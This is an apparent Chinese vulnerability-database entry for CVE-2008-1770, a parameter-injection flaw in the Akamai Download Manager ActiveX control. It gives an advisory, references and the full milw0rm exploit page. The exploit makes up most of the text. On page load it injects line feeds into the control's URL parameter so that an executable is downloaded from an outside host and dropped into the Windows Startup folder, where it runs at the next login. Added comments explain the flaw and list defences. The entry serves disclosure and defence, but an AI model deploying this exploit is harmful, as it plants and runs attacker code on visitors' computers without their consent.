Akamai下载管理器ActiveX控件参数注入漏洞

漏洞ID 1115350 漏洞类型 代码注入
发布时间 2008-06-04 更新时间 2008-09-05
CVE编号 CVE-2008-1770 CNNVD-ID CNNVD-200806-067
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/5741
https://cxsecurity.com/issue/WLB-2008060083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-067
|漏洞详情
Akamai下载管理器是用于帮助用户方便下载的客户端软件。Akamai的ActiveX控件在处理参数数据时存在漏洞,远程攻击者可能利用此漏洞在用户系统的任意位置写入文件。当用户从 http://dlm.tools.akamai.com/tools/upgrade.html 下载安装Akamai下载管理器ActiveX控件时,页面通过如下参数设置URL值:PARAM name="URL" value="http://dlm.tools.akamai.com/tools_files/Readme.txt"。但如果在URL值中注入换行符(\x0A)及其他内容,控件同样会照常解析,例如:PARAM name="URL" value="http://dlm.tools.akamai.com/tools_files/Readme.txt\x0Areferer=http://ruder.cdut.net"。由于ActiveX控件把所设置的参数值以INI文件格式保存在临时文件中,换行符之后的内容会成为文件中新的一行,上述方式因此会改变referer值。此外,控件使用target参数设置下载文件的保存位置,取值含义如下:"DESKTOP"将文件保存到桌面;"AUTO"将文件保存到临时Internet文件中;第三个取值(本页文本中其名称缺失)询问用户选择保存位置。正常情况下target值只能设置为以上三个值,其他值会被过滤掉。但如果通过参数注入将该值设置为有效的文件路径,就可以任意设置target,Akamai下载管理器会未经用户交互直接将目标文件下载到用户系统的任意位置。
|漏洞EXP
<html>
        

    <!--

	/**********************************************************************************
	Exploit start here, by cocoruder(frankruder_at_hotmail.com)
	For "Akamai Download Manager File Download To Arbitrary Location Vulnerability".         

	This exploit will download "http://ruder.cdut.net/attach/calc.exe" to "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe".
	***********************************************************************************/

        
                
        DLM:       v2.2.3
        Received:  ActiveX, v2.2.3.5
        Reason:    MSIE 6
        Language:  en (Automatically detected)
                
            
    -->

    <head>

        <!-- Begin head fragment -->

        
            
                
  <title>Download Manager</title> 
  <script TYPE="text/javascript" LANGUAGE="javascript">
  // Resize the browser window to 500 x 510 pixels as soon as the head script runs.
  window.resizeTo(500, 510);
  </script>

            

        <!-- End head fragment -->

        <script language="JavaScript">

            // Page-state flags: bDocReady is maintained by docReady(), bInsObj is
            // set by insertObj() once the <object> markup has been written.
            var bDocReady = false,
                bInsObj   = false;

            // Coarse platform/browser detection by substring match on the
            // user-agent string. Of these, only isIE7 is read by the script
            // shown in this listing.
            var isLinux   = navigator.userAgent.indexOf("Linux") !== -1;
            var isMacFF   = navigator.userAgent.indexOf("Firefox") !== -1 && navigator.userAgent.indexOf("Mac") !== -1;
            var isSafari  = navigator.userAgent.indexOf("Safari") !== -1;
            var isSolaris = navigator.userAgent.indexOf("Sun") !== -1;
            var isWinFF   = navigator.userAgent.indexOf("Firefox") !== -1 && navigator.userAgent.indexOf("Windows") !== -1;
            var isIE7     = navigator.userAgent.indexOf("MSIE 7") !== -1;

            // <body onload> handler: schedules the first startDLM() attempt one
            // second after the page has loaded, with no user interaction.
            function doLoad() {
                setTimeout("startDLM();", 1000);
            }

        
                

            // Download-manager lifecycle flags shared by the functions below.
            var bdmIsReady = false,   // control reported readyState 4
                bDMStarted = false,   // StartDownload() was called without throwing
                bDMFailed  = false,   // give up: control missing or too many retries
                bShutdown  = false;   // shutdown already initiated

            // Number of doStart() attempts made so far.
            var startTries = 0;

            // <body onbeforeunload> handler: asks for confirmation before the
            // window closes while a download is running. Does nothing when the
            // user agent matched "MSIE 7".
            function closeIt() {
                var downloadActive = bDMStarted && !bShutdown;

                if (!isIE7 && downloadActive) {
                    event.returnValue = "The Download Manager is still running.\n" +
                        "Pressing 'OK' will stop any active downloads and close the Download Manager.";
                }
            }

            

        </script>

        
        <noscript><meta http-equiv="Refresh" content="2;url=http://dlm.tools.akamai.com/tools_files/Readme.txt" /></noscript>
            

    </head>

    <body onload="doLoad()" onbeforeunload="closeIt()">

        <!-- Begin body fragment -->

        
            
                
                    
                        <table cellpadding="10" cellspacing="0" border="0">
                          <!-- Static explanatory text shown to the visitor; the link is a plain download of Readme.txt. -->
                          <tr>
                            <td>
                              <strong>About the Download Manager</strong><br>
                              <p>The Download Manager provides for more effective, more efficient file downloads than you normally see with your browser, especially for large files or file sets.  It can pause and restart downloads even if you turn your computer off and on again. You will be presented with a security warning and after you accept, the Download Manager will install and begin to download the requested file.</p>
                              <p>Should the Download Manager fail to start, or if you do not accept the security certificate, you can <a href="http://dlm.tools.akamai.com/tools_files/Readme.txt">click here</a> to download the file without using the download manager.</p><p/>
                            </td>
                          </tr>
                        </table>

                    
            

        <!-- End body fragment -->

        <DIV ID="objectDIV"></DIV>

        <script language="JavaScript">

        
                

            // Handler for the control's "DLMShutdown" event: closes the window
            // once. Repeated calls are ignored via bShutdown.
            function doDLMShutdown() {
                if (!bShutdown) {
                    bShutdown = true;
                    window.opener = null;
                    window.close();
                }
            }


            // Try to start the download on the inserted control.
            // Gives up (bDMFailed) after 120 attempts or when the "dm" element
            // is missing; otherwise (re)binds the DLMShutdown handler and calls
            // StartDownload().
            function doStart() {
                startTries += 1;
                if (startTries > 120) {
                    bDMFailed = true;
                    return;
                }

                try {
                    var control = document.getElementById("dm");
                    if (control == null) {
                        bDMFailed = true;
                        return;
                    }

                    // Detach before attaching so the handler is bound exactly once
                    // across retries.
                    control.detachEvent("DLMShutdown", doDLMShutdown);
                    control.attachEvent("DLMShutdown", doDLMShutdown);

                    control.StartDownload();
                    bDMStarted = true;
                } catch (err) {
                    bDMStarted = false;
                    // An exception described as "object Error" leaves the retry
                    // loop running; any other description marks the start as failed.
                    if (err.description != "object Error") {
                        bDMFailed = true;
                    }
                }
            }

            // Polling driver: once the document is ready, insert the control and,
            // when it reports ready, start the download. Re-arms itself every
            // 500 ms until the download has started or a failure is recorded.
            function startDLM() {
                if (bDocReady) {
                    insertObj();
                    if (bdmIsReady) {
                        doStart();
                    }
                }

                // On failure, do not fall back to a direct download: this
                // happens by default on XP SP2 and above.
                if (bDMFailed || bDMStarted) {
                    return;
                }

                setTimeout("startDLM();", 500);
            }

            // readystatechange handler for the control: records readiness once
            // the "dm" element reports readyState 4, or failure if the element
            // cannot be found.
            function dmReady() {
                var control = document.getElementById("dm");

                if (control == null) {
                    bDMFailed = true;
                } else if (control.readyState == 4) {
                    bdmIsReady = true;
                }
            }
            

            // readystatechange handler for the document: mirrors whether
            // document.readyState is "complete" into bDocReady.
            function docReady() {
                bDocReady = (document.readyState == "complete");
            }

            // Insert the code to create the DM object.
            //
            // Builds, as one string, an <object> tag for the Akamai Download
            // Manager ActiveX control (CLSID 4871A87A-BFDD-4106-8153-FFDE2BAC2967,
            // CODEBASE pointing at the 2.2.3.5 cab) together with its <PARAM>
            // children, assigns it to the #objectDIV container through innerHTML,
            // and hooks dmReady() to the control's readystatechange event.
            function insertObj() {
                // Only insert the object once
                if (!bInsObj) {
                    bInsObj = true;

                    // Create object tag


                    var sObjHTML = "<object id=\"dm\" classid=\"CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967\" CODEBASE=\"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.3.5.cab#Version=2,2,3,5\" width=1 height=1> " +
                        "   <PARAM name=\"logging\" value=\"1\"/> " +

                        "    <PARAM name=\"version\" value=\"2.2.3\"/> " +



                        /**********************************************************************************
                        Exploit start here, by cocoruder(frankruder_at_hotmail.com)
                        For "Akamai Download Manager File Download To Arbitrary Location Vulnerability".

                        This exploit will download "http://ruder.cdut.net/attach/calc.exe" to "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe".
                        ***********************************************************************************/

                        // NOTE(review): the URL value below carries more than a URL. Each "\x0A"
                        // is a JavaScript escape for a line feed, and every line feed is followed
                        // by a "key=value" pair (referer, md5, target, ...). According to the
                        // advisory text published with this listing, the control stores PARAM
                        // values in an INI-format temporary file, so the embedded line feeds
                        // become additional INI lines. The injected "target=" line names a path
                        // in the All Users Startup folder rather than one of the documented
                        // target values.
                        // Defensive takeaways: the control has to reject control characters in
                        // PARAM values and validate "target" after the settings file is parsed,
                        // not before. Observable artifacts are <object> markup for this CLSID
                        // whose PARAM value contains a line feed, and new executables appearing
                        // in Startup folders. Updating the control, or setting the kill bit for
                        // the CLSID, stops web pages from instantiating the vulnerable version.
                        "    <PARAM name=\"URL\" value=\"http://ruder.cdut.net/attach/calc.exe\x0Areferer=http://ruder.cdut.net\x0Amd5=\x0Atarget=C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe\x0AlogoURL=\x0AiconURL=\x0AproviderName=\x0Alaunch=\x0AcloseWhenDone=yes\x0Aresumable=\x0AdisregardQryStr=\x0AmaxCon=4\x0AinitialView=summary\x0AxPos=100\x0AyPos=100\x0Aicon=true\x0Aencrypt=\x0Alogging=1\x0AfgColor=\x0AbgColor=\x0ArecoveryUrl=http://dlm.tools.akamai.com/Readme.txt\x0AflushSize=32\x0Alanguage=en\x0AuseMD5=\x0AuseStateReporting=1\x0AbundleDetails=\x0AbundleEnabled=\x0ArequestSize=1024\x0AswooshEnabled=\x0AswooshInstall=\x0Acookie=\"/> " +



                        // The remaining PARAMs are passed as separate elements; several repeat
                        // keys that also appear in the injected lines above.
                        "    <PARAM name=\"recoveryURL\" value=\"http://dlm.tools.akamai.com/Readme.txt\"/> " +
                        "    <PARAM name=\"language\" value=\"en\"/> " +
                        "    <PARAM name=\"providerName\" value=\"\"/> " +
                        "    <PARAM name=\"maxCon\" value=\"4\"/> " +
                        "    <PARAM name=\"maxConn\" value=\"4\"/> " +
                        "    <PARAM name=\"requestSize\" value=\"1024\"/> " +
                        "    <PARAM name=\"flushSize\" value=\"32\"/> " +


                        "    <PARAM name=\"initialView\" value=\"summary\"/> " +



                        "    <PARAM name=\"icon\" value=\"true\"/> " +






                        "    <PARAM name=\"launch\" value=\"no\"/> " +


                        "    <PARAM name=\"closeWhenDone\" value=\"no\"/> " +







                        "</object> ";


                    // objdiv is assigned without var, so it becomes an implicit global.
                    objdiv = document.getElementById("objectDIV");
                    if (objdiv == null) {

                        // No container to host the control: navigate to the plain
                        // Readme.txt download instead.
                        document.location.replace("http://dlm.tools.akamai.com/tools_files/Readme.txt");

                        return;
                    }



                    // Parsing this markup is what makes the browser instantiate the control.
                    objdiv.innerHTML = sObjHTML;

                    // NOTE(review): dm is not declared in this function; presumably it
                    // resolves through the browser exposing the element id "dm" as a
                    // global — confirm. The null check records the failure but does not
                    // return, so the assignment below would still dereference dm.
                    if (dm == null) {
                        bDMFailed = true;
                    }

                    // Set up handler for DM readystate change
                    dm.onreadystatechange = dmReady;
                    // Call once directly as well, in addition to the event hook.
                    dmReady();



                }
            }

        

            // Track document load state: docReady() runs on every readystatechange
            // of the document and keeps bDocReady current for startDLM().
            document.onreadystatechange = docReady;

            

        </script>

    </body>

</html>

# milw0rm.com [2008-06-04]
|参考资料

来源:XF
名称:downloadmanager-url-code-execution(42879)
链接:http://xforce.iss.net/xforce/xfdb/42879
来源:SECTRACK
名称:1020194
链接:http://www.securitytracker.com/id?1020194
来源:BUGTRAQ
名称:20080605AkamaiDownloadManagerFileDownloadedToArbitraryLocationVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/493142/100/0/threaded
来源:BUGTRAQ
名称:20080604AkamaiTechnologiesSecurityAdvisory2008-0001(DownloadManager)
链接:http://www.securityfocus.com/archive/1/archive/1/493077/100/0/threaded
来源:MILW0RM
名称:5741
链接:http://www.milw0rm.com/exploits/5741
来源:VUPEN
名称:ADV-2008-1746
链接:http://www.frsirt.com/english/advisories/2008/1746/references
来源:SECUNIA
名称:30537
链接:http://secunia.com/advisories/30537
来源:FULLDISC
名称:20080604AkamaiTechnologiesSecurityAdvisory2008-0001(DownloadManager)
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2008-June/062672.html